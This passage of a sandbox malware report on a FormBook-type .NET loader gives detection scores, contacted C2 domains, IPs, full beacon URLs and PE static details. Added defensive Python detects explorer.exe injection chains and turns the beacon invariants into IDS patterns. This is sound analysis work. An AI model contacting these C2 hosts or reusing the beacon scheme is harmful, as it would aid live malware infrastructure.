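    Event(6, "create", "explorer.exe", 1000, "cscript.exe", 2005),
    Event(7, "create", "explorer.exe", 1000, "notepad.exe", 2006),
]


def detect_injected_explorer_chain(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (child image, injector image) for every process descending from an
    explorer.exe instance after a foreign process injected into it.

    Direct explorer.exe children are flagged only when they are in LOLBIN_CHILDREN,
    because explorer starts user applications all day; everything a flagged child
    starts is flagged in turn, so the cmd.exe under wlanext.exe is attributed back
    to RegAsm.exe rather than lost.
    """
    tainted: Dict[int, str] = {}   # pid -> image of the process that started the chain
    alerts: List[Tuple[str, str]] = []
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == "inject" and ev.target.lower() == "explorer.exe" \
                and ev.source.lower() != "explorer.exe":
            tainted.setdefault(ev.tpid, ev.source)
        elif ev.kind == "create" and ev.spid in tainted:
            if ev.source.lower() == "explorer.exe" and ev.target.lower() not in LOLBIN_CHILDREN:
                continue
            tainted[ev.tpid] = tainted[ev.spid]
            alerts.append((ev.target, tainted[ev.spid]))
    return alerts


if __name__ == "__main__":
    for child, injector in detect_injected_explorer_chain(SAMPLE_EVENTS):
        print(f"ALERT: {child} descends from explorer.exe injected by {injector}")
```

The taint map is keyed by PID so that a second, clean explorer.exe instance is not blamed for the first one's children; in real telemetry the inject event should additionally require that the source image is not itself a signed system component, otherwise legitimate shell extensions loaded by explorer.exe would seed the taint.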


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source         | Detection | Scanner        | Label
NQQWym075C.exe | 31%       | Virustotal     |
NQQWym075C.exe | 48%       | ReversingLabs  | ByteCode-MSIL.Trojan.AgentTesla
NQQWym075C.exe | 100%      | Joe Sandbox ML |

The ReversingLabs family label (AgentTesla) does not agree with the FormBook classification in this report. Vendor family labels on packed MSIL loaders are unreliable; the classification here rests on the community Yara match and on the injection chain shown in the behavior graph, not on this label.

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source                               | Detection | Scanner | Label
2.2.RegAsm.exe.400000.0.unpack       | 100%      | Avira   | TR/Crypt.ZPACK.Gen
5.2.RegAsm.exe.400000.0.unpack       | 100%      | Avira   | TR/Crypt.ZPACK.Gen
4.2.NQQWym075C.exe.5fe0000.3.unpack  | 100%      | Avira   | TR/Crypt.ZPACK.Gen

          Domains

Source       | Detection | Scanner    | Label
teelinkz.com | 1%        | Virustotal |

          URLs

Source | Detection | Scanner | Label
http://www.ussouthernhome.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=ldw93ncdIRpnK2+SYFZ4XxcSdaL1EJRCuxI9ZUy/FVTDpSzjKcQcxAtGWqTUr4WUWqsB | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.thrust-board.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=jRDzq8l+sUykxws9W99RfZyinw9UtZsC3+WzPyJGQo9muB/nYvZVAbl6dW3bW8Aotu+H | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.sz360buy.com/d | 0% | Avira URL Cloud | safe
http://www.tnicholson.design/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=M16LsldnfrVP1zxs4qqy0X/sNN1zWVH6uxw1Og8LqWL4V8CpTN5QES3cWjsEPZlyN24a | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.sz360buy.com/o56q/?6l=2CtK5nvmO | 0% | Avira URL Cloud | safe
http://www.teelinkz.com/o56q/?6l=kNK7qyUr0rsKRGX6DQjm/XfEOCgL/rCBvSt6iCqDIwEC5hd1LlIznMkcIp/u79mXMRr7&Rh=Y2MlpveH8ZUh0bF | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.keitakora.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=r4u6PaE5VJhGb5HfNIqoFHA5GyORyqjhLy9oIJBoAQE4G0DswHvYnpLSr9alOGw3azvw | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://www.not-taboo.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=9Sq28+gy4k4CrtJhpK8mM8fwBZ3GLEhrr70589yX6MfPm6K+L9JTnWLRwUnCkAdg62kX | 0% | Avira URL Cloud | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.sabaicraft.com/o56q/?6l=QJ1vQpsCk7HoC7tcDYJYOCEFb+6oaJChP7LjIwOmauzAYwlZDD68O4FtKEqtEO5AoeDi&Rh=Y2MlpveH8ZUh0bF | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.myreviewandbonuses.com/o56q/?6l=3sSzGDKqeoVzrX5Sn8ux2WAGTszDSWdOTpKicZCtYQqt6BLZU/lZy9O7FBLa6j9xXLzf&Rh=Y2MlpveH8ZUh0bF | 0% | Avira URL Cloud | safe
http://www.sakkal.com | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

Name                         | IP              | Active  | Malicious | Reputation
myreviewandbonuses.com       | 66.235.200.112  | true    | true      | unknown
www.deadroommn.com           | 35.186.238.101  | true    | true      | unknown
teelinkz.com                 | 34.102.136.180  | true    | true      | unknown
keitakora.com                | 34.102.136.180  | true    | true      | unknown
www.sz360buy.com             | 160.122.148.234 | true    | true      | unknown
ls3xg13085cb982.dlszywz.com  | 47.91.170.148   | true    | false     | unknown
ext-sq.squarespace.com       | 198.49.23.141   | true    | false     | high
shops.myshopify.com          | 23.227.38.64    | true    | true      | unknown
www.tnicholson.design        | 65.254.250.119  | true    | true      | unknown
thrust-board.com             | 34.102.136.180  | true    | true      | unknown
www.sabaicraft.com           | 192.64.147.164  | true    | true      | unknown
www.houseofhawthorn.com      | unknown         | unknown | true      | unknown
www.bs600mc.com              | unknown         | unknown | true      | unknown
www.ussouthernhome.com       | unknown         | unknown | true      | unknown
www.keitakora.com            | unknown         | unknown | true      | unknown
www.thrust-board.com         | unknown         | unknown | true      | unknown
www.biolineapparel.com       | unknown         | unknown | true      | unknown
www.teelinkz.com             | unknown         | unknown | true      | unknown
www.not-taboo.com            | unknown         | unknown | true      | unknown
www.qzrpxx.com               | unknown         | unknown | true      | unknown
www.myreviewandbonuses.com   | unknown         | unknown | true      | unknown

The www. hostnames the sample queried resolve through their apex or hosting names (the entries with IPs); several of those IPs are shared infrastructure: 34.102.136.180 serves teelinkz.com, keitakora.com and thrust-board.com alike, and 23.227.38.64 and 198.49.23.141 are the shops.myshopify.com and ext-sq.squarespace.com front ends. Blocking these IPs would cause collateral damage; block on hostname and on the /o56q/ URI pattern instead.

                                                  Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.ussouthernhome.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=ldw93ncdIRpnK2+SYFZ4XxcSdaL1EJRCuxI9ZUy/FVTDpSzjKcQcxAtGWqTUr4WUWqsB | true | Avira URL Cloud: safe | unknown
http://www.thrust-board.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=jRDzq8l+sUykxws9W99RfZyinw9UtZsC3+WzPyJGQo9muB/nYvZVAbl6dW3bW8Aotu+H | true | Avira URL Cloud: safe | unknown
http://www.tnicholson.design/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=M16LsldnfrVP1zxs4qqy0X/sNN1zWVH6uxw1Og8LqWL4V8CpTN5QES3cWjsEPZlyN24a | true | Avira URL Cloud: safe | unknown
http://www.teelinkz.com/o56q/?6l=kNK7qyUr0rsKRGX6DQjm/XfEOCgL/rCBvSt6iCqDIwEC5hd1LlIznMkcIp/u79mXMRr7&Rh=Y2MlpveH8ZUh0bF | true | Avira URL Cloud: safe | unknown
http://www.keitakora.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=r4u6PaE5VJhGb5HfNIqoFHA5GyORyqjhLy9oIJBoAQE4G0DswHvYnpLSr9alOGw3azvw | true | Avira URL Cloud: safe | unknown
http://www.not-taboo.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=9Sq28+gy4k4CrtJhpK8mM8fwBZ3GLEhrr70589yX6MfPm6K+L9JTnWLRwUnCkAdg62kX | true | Avira URL Cloud: safe | unknown
http://www.sabaicraft.com/o56q/?6l=QJ1vQpsCk7HoC7tcDYJYOCEFb+6oaJChP7LjIwOmauzAYwlZDD68O4FtKEqtEO5AoeDi&Rh=Y2MlpveH8ZUh0bF | true | Avira URL Cloud: safe | unknown
http://www.myreviewandbonuses.com/o56q/?6l=3sSzGDKqeoVzrX5Sn8ux2WAGTszDSWdOTpKicZCtYQqt6BLZU/lZy9O7FBLa6j9xXLzf&Rh=Y2MlpveH8ZUh0bF | true | Avira URL Cloud: safe | unknown

All eight are marked malicious on behavioural grounds (a system process, explorer.exe, made the requests after injection) while Avira URL Cloud still rates every one of them safe. Reputation lags the sandbox verdict here; the stable indicators are the path token /o56q/ and the query value Rh=Y2MlpveH8ZUh0bF, which recur on every host, while the 6l= blob differs per host.
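The eight contacted URLs above differ only in host and in the 6l= value; the path token /o56q/ and Rh=Y2MlpveH8ZUh0bF are constant. The following added example (written for this page, not part of the report) takes those URLs, plus the truncated one recovered from wlanext.exe memory, as constructed input, finds the query values that repeat verbatim across distinct hosts for each path token, and turns each such invariant into a URI regex usable in a proxy or IDS rule. The function names and the min_hosts threshold are the editor's choices.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

# Constructed input, copied from the Contacted URLs table of this report plus the
# partial URL recovered from wlanext.exe memory. Nothing here is fetched.
OBSERVED_URLS: List[str] = [
    "http://www.ussouthernhome.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=ldw93ncdIRpnK2+SYFZ4XxcSdaL1EJRCuxI9ZUy/FVTDpSzjKcQcxAtGWqTUr4WUWqsB",
    "http://www.thrust-board.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=jRDzq8l+sUykxws9W99RfZyinw9UtZsC3+WzPyJGQo9muB/nYvZVAbl6dW3bW8Aotu+H",
    "http://www.tnicholson.design/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=M16LsldnfrVP1zxs4qqy0X/sNN1zWVH6uxw1Og8LqWL4V8CpTN5QES3cWjsEPZlyN24a",
    "http://www.teelinkz.com/o56q/?6l=kNK7qyUr0rsKRGX6DQjm/XfEOCgL/rCBvSt6iCqDIwEC5hd1LlIznMkcIp/u79mXMRr7&Rh=Y2MlpveH8ZUh0bF",
    "http://www.keitakora.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=r4u6PaE5VJhGb5HfNIqoFHA5GyORyqjhLy9oIJBoAQE4G0DswHvYnpLSr9alOGw3azvw",
    "http://www.not-taboo.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=9Sq28+gy4k4CrtJhpK8mM8fwBZ3GLEhrr70589yX6MfPm6K+L9JTnWLRwUnCkAdg62kX",
    "http://www.sabaicraft.com/o56q/?6l=QJ1vQpsCk7HoC7tcDYJYOCEFb+6oaJChP7LjIwOmauzAYwlZDD68O4FtKEqtEO5AoeDi&Rh=Y2MlpveH8ZUh0bF",
    "http://www.myreviewandbonuses.com/o56q/?6l=3sSzGDKqeoVzrX5Sn8ux2WAGTszDSWdOTpKicZCtYQqt6BLZU/lZy9O7FBLa6j9xXLzf&Rh=Y2MlpveH8ZUh0bF",
    "http://www.sz360buy.com/o56q/?6l=2CtK5nvmO",   # truncated in memory; no Rh= captured
]


def parse_beacon(url: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a beacon URL into (host, path, raw query parameters).

    The query is split by hand instead of with urllib's parse_qs because the
    values are base64-like: parse_qs would turn '+' into a space and drop a
    trailing '=' padding character.
    """
    parts = urlsplit(url)
    params: Dict[str, str] = {}
    for pair in parts.query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[key] = value
    return parts.hostname or "", parts.path, params


def campaign_invariants(urls: List[str], min_hosts: int = 2) -> Dict[str, dict]:
    """Group URLs by path token and, per group, list the (key, value) pairs that
    recur verbatim on at least min_hosts distinct hosts. Those are the values the
    build keeps constant across its C2 candidates; per-host values drop out."""
    by_path: Dict[str, dict] = defaultdict(lambda: {"hosts": set(), "seen": defaultdict(set)})
    for url in urls:
        host, path, params = parse_beacon(url)
        by_path[path]["hosts"].add(host)
        for key, value in params.items():
            by_path[path]["seen"][(key, value)].add(host)
    report: Dict[str, dict] = {}
    for path, group in by_path.items():
        invariants = {kv: sorted(hosts) for kv, hosts in group["seen"].items()
                      if len(hosts) >= min_hosts}
        report[path] = {"hosts": sorted(group["hosts"]), "invariants": invariants}
    return report


def build_uri_pattern(path: str, key: str, value: str) -> "re.Pattern[str]":
    """Regex for proxy/IDS matching: the path token followed by the invariant
    key=value at any position in the query, with nothing appended to the value."""
    return re.compile(
        re.escape(path) + r"\?(?:[^#]*&)?" + re.escape(key) + "=" + re.escape(value) + r"(?:&|$)"
    )


if __name__ == "__main__":
    for path, group in campaign_invariants(OBSERVED_URLS).items():
        print(f"path token {path}: {len(group['hosts'])} hosts")
        for (key, value), hosts in group["invariants"].items():
            pattern = build_uri_pattern(path, key, value).pattern
            print(f"  invariant {key}={value} seen on {len(hosts)} hosts -> {pattern}")
        for host in group["hosts"]:
            print(f"  block host {host}")
```

The pattern is deliberately anchored on the path token and one invariant rather than on the parameter names alone: the Joe Sandbox View / Context section further down shows other samples on the same IP using different path tokens (/bw82/, /d8h/) and different parameter names, so a rule built from this sample's names would not carry over to the next build, while the procedure itself can be re-run on that build's URLs.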

                                                  URLs from Memory and Binaries

Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp

Name | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | false | | high
http://www.fontbureau.com | false | | high
http://www.fontbureau.com/designersG | false | | high
http://www.fontbureau.com/designers/? | false | | high
http://www.founder.com.cn/cn/bThe | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | false | | high
http://www.tiro.com | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | false | | high
http://www.goodfont.co.kr | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | false | URL Reputation: safe | unknown
http://www.typography.netD | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | false | | high
http://www.founder.com.cn/cn/cThe | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | false | URL Reputation: safe | unknown
http://fontfabrik.com | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | false | | high
http://www.jiyu-kobo.co.jp/ | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | false | | high
http://www.fonts.com | false | | high
http://www.sandoll.co.kr | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | false | URL Reputation: safe | unknown
http://www.sakkal.com | false | URL Reputation: safe | unknown

Source: wlanext.exe, 00000006.00000002.485637823.00000000034A5000.00000004.00000020.sdmp

Name | Malicious | Antivirus Detection | Reputation
http://www.sz360buy.com/d | false | Avira URL Cloud: safe | unknown

Source: wlanext.exe, 00000006.00000002.485456630.0000000003496000.00000004.00000020.sdmp

Name | Malicious | Antivirus Detection | Reputation
http://www.sz360buy.com/o56q/?6l=2CtK5nvmO | false | Avira URL Cloud: safe | unknown

The explorer.exe entries are font-foundry and licence URLs (Font Bureau, Tiro, Carter & Cone, Sakkal, Sandoll, URW and so on) carried in font metadata in explorer.exe's own memory; the trailing characters such as "DPlease" and "bThe" are the next word of that metadata text running into the string. They are not indicators for this sample. Only the two wlanext.exe strings belong to it, and they are fragments of the same /o56q/ beacon seen in the Contacted URLs table.

                                                                      Contacted IPs


                                                                      Public

IP              | Domain  | Country       | ASN    | ASN Name                            | Malicious
66.235.200.112  | unknown | United States | 13335  | CLOUDFLARENETUS                     | true
35.186.238.101  | unknown | United States | 15169  | GOOGLEUS                            | true
160.122.148.234 | unknown | South Africa  | 137951 | CLAYERLIMITED-AS-APClayerLimitedHK  | true
198.49.23.141   | unknown | United States | 53831  | SQUARESPACEUS                       | false
192.64.147.164  | unknown | United States | 19867  | VOODOO1US                           | true
23.227.38.64    | unknown | Canada        | 13335  | CLOUDFLARENETUS                     | true
34.102.136.180  | unknown | United States | 15169  | GOOGLEUS                            | true
65.254.250.119  | unknown | United States | 29873  | BIZLAND-SDUS                        | true

                                                                      General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 321308
Start date: 20.11.2020
Start time: 20:12:07
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 1s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: NQQWym075C.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@12/0@15/8
EGA Information: Failed
HDC Information:
• Successful, ratio: 53.5% (good quality ratio 49.2%)
• Quality average: 71.8%
• Quality standard deviation: 31.1%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• TCP Packets have been reduced to 100
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
• Excluded IPs from analysis (whitelisted): 52.147.198.201, 2.18.68.82, 51.104.144.132, 2.20.142.210, 2.20.142.209, 20.54.26.129, 92.122.213.247, 92.122.213.194
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, fs.microsoft.com, arc.msn.com.nsatc.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Note that conhost.exe is on the whitelisted-process list, so the conhost.exe leaf in the behavior graph carries no recorded behaviour, and the "Behavior information exceeds normal sizes" and "TCP Packets have been reduced to 100" warnings mean the network and API tables in this light report are samples, not the full capture.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                      • 104.18.27.190
                                                                      https://ubereats.app.link/cwmLFZfMz5?%243p=a_custom_354088&%24deeplink_path=promo%2Fapply%3FpromoCode%3DRECONFORT7&%24desktop_url=tracking.spectrumemp.com/el?aid=8feeb968-bdd0-11e8-b27f-22000be0a14e&rid=50048635&pid=285843&cid=513&dest=overlordscan.com/cmV0by5tZXR6bGVyQGlzb2x1dGlvbnMuY2g=%23#kkowfocjoyuynaip#Get hashmaliciousBrowse
                                                                      • 104.24.97.83
                                                                      https://hastebin.com/raw/xatuvoxixaGet hashmaliciousBrowse
                                                                      • 104.24.126.89
                                                                      https://bit.ly/35MTO80Get hashmaliciousBrowse
                                                                      • 104.31.69.156
                                                                      Order List.xlsxGet hashmaliciousBrowse
                                                                      • 104.24.122.89
                                                                      USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEGet hashmaliciousBrowse
                                                                      • 162.159.133.233
                                                                      Request for quotation.xlsxGet hashmaliciousBrowse
                                                                      • 172.67.181.41
                                                                      MV TBN.exeGet hashmaliciousBrowse
                                                                      • 104.28.5.151
                                                                      PO 20-11-2020.ppsGet hashmaliciousBrowse
                                                                      • 172.67.22.135
                                                                      SQUARESPACEUSvOKMFxiCYt.exeGet hashmaliciousBrowse
                                                                      • 198.49.23.141
                                                                      kayx.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.141
                                                                      BANK ACCOUNT INFO!.exeGet hashmaliciousBrowse
                                                                      • 198.49.23.141
                                                                      http://WWW.ALYSSA-J-MILANO.COMGet hashmaliciousBrowse
                                                                      • 198.185.159.141
                                                                      Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                                                      • 198.49.23.141
                                                                      baf6b9fcec491619b45c1dd7db56ad3d.exeGet hashmaliciousBrowse
                                                                      • 198.49.23.177
                                                                      http://f69e.engage.squarespace-mail.comGet hashmaliciousBrowse
                                                                      • 198.49.23.141
                                                                      NEW PO.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.141
                                                                      p8LV1eVFyO.exeGet hashmaliciousBrowse
                                                                      • 198.49.23.177
                                                                      dB7XQuemMc.exeGet hashmaliciousBrowse
                                                                      • 198.49.23.141
                                                                      hRVrTsMv25.exeGet hashmaliciousBrowse
                                                                      • 198.49.23.141
                                                                      qkN4OZWFG6.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      kvdYhqN3Nh.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      NzI1oP5E74.exeGet hashmaliciousBrowse
                                                                      • 198.49.23.141
                                                                      IQtvZjIdhN.exeGet hashmaliciousBrowse
                                                                      • 198.49.23.177
                                                                      PO.exeGet hashmaliciousBrowse
                                                                      • 198.49.23.141
                                                                      148wWoi8vI.exeGet hashmaliciousBrowse
                                                                      • 198.49.23.177
                                                                      H4A2-423-EM154-302.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.141
                                                                      KZ7qjnBlZF.exeGet hashmaliciousBrowse
                                                                      • 198.49.23.141
                                                                      scnn7676766.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      No created / dropped files found

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.8534634080579835
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      File name:NQQWym075C.exe
                                                                      File size:552960
                                                                      MD5:bf75ed61e1b1f7b310ec1d999077c4dd
                                                                      SHA1:cdced77e176e38ff459cdea08941de26861647cd
                                                                      SHA256:69357684ec8f83d428d2030db5f3d586718207e86457465e7fd37b3b4b7c4db2
                                                                      SHA512:d2fa7f6e1e41bebedbdba492a163b8388f2326b92d939e9352c32f5be5a311bb75e4374524b2b314b5a426763113935e00f4c81aacc26ed08e9c9dd356dd7510
                                                                      SSDEEP:12288:iYHsi433VV/WKmD8UT9Qw4RB07JglwNtAyYtoUqqwyniC:7Hs73NmD/6w4yOwrC9qgi
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Wt._.................h............... ........@.. ..............................p.....@................................

                                                                      File Icon

                                                                      Icon Hash:00828e8e8686b000

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x48868e
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                      Time Stamp:0x5FB77457 [Fri Nov 20 07:46:31 2020 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:v4.0.30319
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                      Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
(the remaining 97 instructions of the preview are add byte ptr [eax], al, which is how zero padding (00 00) disassembles)

00402000h is the image base 0x400000 plus the IAT at RVA 0x2000 (see Data Directories), whose only entry is mscoree.dll!_CorExeMain (see Imports). This is the standard native stub of a .NET executable: the code that matters is the managed CIL inside .text, not this entrypoint.

                                                                      Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x88640 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8a000 | 0x242 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8c000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                      Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x86694 | 0x86800 | False | 0.902309261733 | data | 7.85956112401 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x8a000 | 0x242 | 0x400 | False | 0.310546875 | data | 3.56952524932 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x8c000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                      Resources

Name | RVA | Size | Type | Language | Country
RT_MANIFEST | 0x8a058 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                                                      Imports

DLL | Import
mscoree.dll | _CorExeMain
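
The three static facts above that decide triage (a .text section at entropy 7.86, a CLI header in the COM_DESCRIPTOR directory, and a native entrypoint that is nothing but `jmp dword ptr [00402000h]` into a one-entry IAT for mscoree.dll!_CorExeMain) can be recomputed from the raw file without pefile. The following is an added example, not code from Joe Sandbox or from the sample: a minimal PE32 header walker that reports section entropy and resolves the entrypoint stub through the IAT and import descriptors. It runs on a constructed image that copies the layout reported here (IAT at RVA 0x2000, CLI header at 0x2008, single import, random bytes elsewhere in .text), not on NQQWym075C.exe itself; the constructed image and the 0x1000-byte .text size are assumptions for the demonstration.

```python
import math
import random
import struct
from collections import Counter, namedtuple

# Added example, not code from the Joe Sandbox report or from the sample. It recomputes,
# from raw bytes and without pefile, three things the Static PE Info section reports:
# per-section Shannon entropy, the CLI (COM descriptor) data directory, and whether the
# native entrypoint is only `jmp dword ptr [IAT slot]` to mscoree.dll!_CorExeMain.

DIR_IMPORT, DIR_IAT, DIR_COM_DESCRIPTOR = 1, 12, 14
Section = namedtuple("Section", "name rva vsize raw_ptr raw_size")

def entropy(data):
    """Shannon entropy in bits per byte (0..8); .text at ~7.86 is packed or encrypted."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def parse_pe(img):
    """(entrypoint RVA, image base, data directories, sections) of a PE32 image."""
    e_lfanew, = struct.unpack_from("<I", img, 0x3C)
    if img[:2] != b"MZ" or img[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
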